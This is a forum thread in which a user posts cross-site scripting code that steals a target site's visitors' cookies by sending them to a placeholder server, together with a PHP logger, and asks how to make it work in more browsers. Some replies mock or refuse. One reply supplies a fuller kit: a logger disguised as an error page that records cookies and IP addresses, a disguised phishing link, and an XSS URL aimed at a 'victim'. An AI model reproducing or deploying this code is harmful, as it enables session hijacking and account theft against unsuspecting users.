Results 1 to 8 of 8

Thread: Cookie

  1. #1

    Cookie

    Okay this is what I have on my targets site.

    Code:
    <script>
    document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;
    </script>
    And this is what is on my server.

    Code:
    Code:
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>

    For some reason this only works on Opera any ideas on how I can this compatible with IE and FF?

  2. #2
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    try sending an email to abuse@WhateverYourISP.net is or .com whatever it may be and ask them, most of them are bored with most "How do I haxxor Hotmail" reqwuests but you've put work into yours so they may help you out more. Make sure to include your real name so they can look you up to validate you as a customer.

  3. #3
    **** you buddy. I just don't know much about JS or PHP just needed some help I can clearly so you can't help.

  4. #4
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    I already helped you, I said to email them and have them hook you up. If you don't like my answer maybe you should try asking a question that isn't making you appear stupid.

  5. #5
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795
    **** you buddy. I just don't know much about JS or PHP just needed some help I can clearly so you can't help.
    Thats not cool.

    This question looks very similar to

    http://elitehackers.info/forums/showthread.php?t=5772


  6. #6
    Senior Member
    Join Date
    Dec 2003
    Location
    Pacific Northwest
    Posts
    1,675
    Originally posted here by phyburn
    **** you buddy. I just don't know much about JS or PHP just needed some help I can clearly so you can't help.

    He might thank you for the offer however even if you were to dress up like a hooker on payday, I doubt that he’d do you. What kind of response did you think you would receive when you ask us to help you be an ass? Obviously you don’t need our assistance. You’ve succeeded!

    cheers
    Connection refused, try again later.

  7. #7
    Banned
    Join Date
    Jul 2006
    Location
    /
    Posts
    385
    save it as cookie.php
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>error-404</title>
    </head>
    
    <body>
    <?
    $logfile = 'log.txt';
    $cookie = $_GET['c'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("j F, Y, g:i a");
    $referer=getenv ('HTTP_REFERER');
    
    if ($cookie!='') {
     $fp = fopen($logfile, 'a');
      fwrite($fp, "Cookie: ".$cookie."\nIP: " .$ip. "\nDate and Time: " .$date. "\nReferer: ".$referer."\n-------------------------------------------------------------------\n");
        }
    ?>
    </body>
    </html>
    or you could even use this:

    Code:
    <a
    href=”http://www.example.com/index.php?page=<script>document.location.replace('http://www.mysite.com/log.php?c=' +document.cookie);</script>”
    nomouseover=”window.status='http://www.example.com/login.php'; return true”
    onmouseout=”window.status=''; return true”
    >Login page</a>
    then create a blank .txt file called log.txt chmod it to 666...
    put that in the same directory as the cookie.php

    this is the url that you use to get the cookie sessions from the victim.
    Code:
    &lt;a http://puttargersiteaddressehere.com&lt;script&gt;document.location='http://your-site-goes-here.com/cookie.php?c='+document.cookie&lt;/script&gt;
    i do have other variations that can be used. but it would not be appropriate to upload the .zip here.

    shoot me a pm..

  8. #8
    They call me the Hunted foxyloxley's Avatar
    Join Date
    Nov 2003
    Location
    3rd Rock from Sun
    Posts
    2,534
    over a year here
    and THIS is the best you can come up with

    what a complete waste of electrons
    so now I'm in my SIXTIES FFS
    WTAF, how did that happen, so no more alterations to the sig, it will remain as is now

    Beware of Geeks bearing GIF's
    come and waste the day :P at The Taz Zone

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •